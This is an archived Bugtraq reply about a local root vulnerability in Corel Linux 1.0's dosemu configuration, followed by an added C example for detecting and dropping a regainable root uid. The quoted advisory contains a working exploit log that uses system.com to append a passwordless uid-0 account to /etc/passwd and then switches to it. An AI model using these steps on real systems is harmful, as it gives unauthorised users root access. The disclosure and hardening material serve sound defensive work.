[14188] in bugtraq

Re: Corel Linux 1.0 dosemu default configuration: Local root vuln

daemon@ATHENA.MIT.EDU (Seth R Arnold)
Tue Mar 7 08:51:43 2000

Mail-Followup-To: suid@SUID.KG, BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <20000303103351.G10971@willamette.edu>
Date:         Fri, 3 Mar 2000 10:33:51 -0800
Reply-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
From: Seth R Arnold <sarnold@WILLAMETTE.EDU>
X-To:         suid@SUID.KG
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <200003020436.PAA20168@jawa.chilli.net.au>; from suid@SUID.KG on
              Thu, Mar 02, 2000 at 04:47:11AM +0000

I tested this on Debian's dosemu, Version: 0.98.8-2, (Debian woody) and
did not get these results. It seems the Debian maintainer (Herbert Xu)
Did The Right Thing in the config file.

:)

* suid@SUID.KG <suid@SUID.KG> [000303 10:28]:
> Re all,
>
> Hadn't seen this one around yet, has been on my site for about a week now.
>
> Corel's mailserver bounced me about this IIRC? What's up Corel?
>
> Cheers.
>
> ----------------------------
>
> suid@suid.kg - Corel Linux dosemu config error. Local root compromise.
>
> Software: 	Corel Linux 1.0 dosemu distribution configuration
> URL:		http://linux.corel.com
> Version:	Version 1.0
> Platforms:	Corel Linux only.
> Type:	 	Default misconfiguration. No one reads README anymore??
>
> Summary:
>
> 	Local users can take advantage of a packaging and configuration
> 	error (which has been known and documented for a long time) to
> 	execute arbitrary commands as root.
>
> 	We see from the doc/README/SECURITY file as well as
> 	http://www.dosemu.org/docs/README/0.98/README-3.html
> 	written in 1997 that this configuration is bad.
>
> Vulnerability:
>
> 	The system.com command is available to any user who runs the
> 	dos emulator. This is a direct violation of the advice from
> 	the SECURITY readme file:
>
> 		Never allow the 'system.com' command (part of dosemu)
> 		to be executed. It makes dosemu
> 		execute the libc 'system() function'. Though privileges
> 		are turned off, the process inherits the
> 		switched uid-setting (uid=root, euid=user), hence the
> 		unix process can use setreuid to gain root
> 		access back. ... the rest you can imagine your self.
>
> Exploit:
>
> 	This is a script log which details how to reproduce this:
>
> 	
> 		Script started on Fri Feb 25 13:54:00 2000
> 		nebula:~$ id
> 		uid=1000(suid) gid=1000(suid) groups=1000(suid)
> 		nebula:~$ cat > hack-corel
> 		#!/bin/bash
> 		echo "owned::0:0::/:/bin/bash" >> /etc/passwd
> 		^D
> 		nebula:~$ chmod a+rx hack-corel
> 		nebula:~$ export PATH="$PATH:."
> 		nebula:~$ dos
> 		CPU speed set to 430/1 MHz
> 		Running on CPU=586, FPU=1, rdtsc=1
>
> 			[ snip bunch of dosemu crap ]
>
> 		"Welcome to dosemu 0.98!
> 		C:\> system hack-corel;
> 		sh: : command not found
> 		C:\> exitERROR: general protection at 0x3f0ff: 0
> 		ERROR: SIGSEGV, protected insn...exiting!
>
> 		nebula:~$ tail -1 /etc/passwd
> 		owned::0:0::/:/bin/bash
> 		nebula:~$ su owned
> 		nebula:/home/suid# id
> 		uid=0(root) gid=0(root) groups=0(root)
> 		nebula:/home/suid# exit
> 		exit
> 		nebula:~$ exit
>
> 		Script done on Fri Feb 25 13:55:27 2000
>
> Note:
> 	This is not a vulnerability in dosemu itself. The documentation
> 	warns users very specifically that this will happen if the system
> 	is configured as such.
>
> Greets:
>
> 	duke
> 	cr
> 	active
> 	

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
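
Added example, not part of the original messages and not dosemu code: a C sketch of the "uid=root, euid=user" state the quoted SECURITY readme describes, with a check that flags it from a /proc/<pid>/status "Uid:" line and a drop that leaves no way back before system() is called. The function names are hypothetical and the sample lines are constructed; Linux semantics are assumed.

```c
/* Added example (hypothetical names): audit and close the
 * "uid=root, euid=user" state before running a child process. */
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if a non-root effective uid can still be switched back to root,
 * i.e. the real or saved uid is 0 (the state the README describes). */
int uid_regainable(unsigned ruid, unsigned euid, unsigned suid)
{
    return euid != 0 && (ruid == 0 || suid == 0);
}

/* Parse a "Uid:" line from /proc/<pid>/status (real, effective, saved, fs).
 * Returns 1 if regainable, 0 if not, -1 if this is not a Uid: line. */
int status_line_regainable(const char *line)
{
    unsigned r, e, s, fs;
    if (sscanf(line, "Uid: %u %u %u %u", &r, &e, &s, &fs) != 4)
        return -1;
    return uid_regainable(r, e, s);
}

/* Drop to uid/gid with no way back; call before system() or exec(). */
int drop_for_good(uid_t uid, gid_t gid)
{
    /* If root is still reachable, take it briefly to clear extra groups. */
    if (seteuid(0) == 0 && setgroups(1, &gid) != 0)
        return -1;
    /* Setting the real id also resets the saved id on Linux. */
    if (setregid(gid, gid) != 0 || setreuid(uid, uid) != 0)
        return -1;
    /* Verify: an attempt to become root again must now fail. */
    if (uid != 0 && (setuid(0) == 0 || seteuid(0) == 0))
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed sample lines, not taken from a real system. */
    const char *dropped_temporarily = "Uid:\t0\t1000\t1000\t1000";
    const char *dropped_for_good = "Uid:\t1000\t1000\t1000\t1000";
    printf("%d %d\n", status_line_regainable(dropped_temporarily),
           status_line_regainable(dropped_for_good));
    return 0;
}
```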
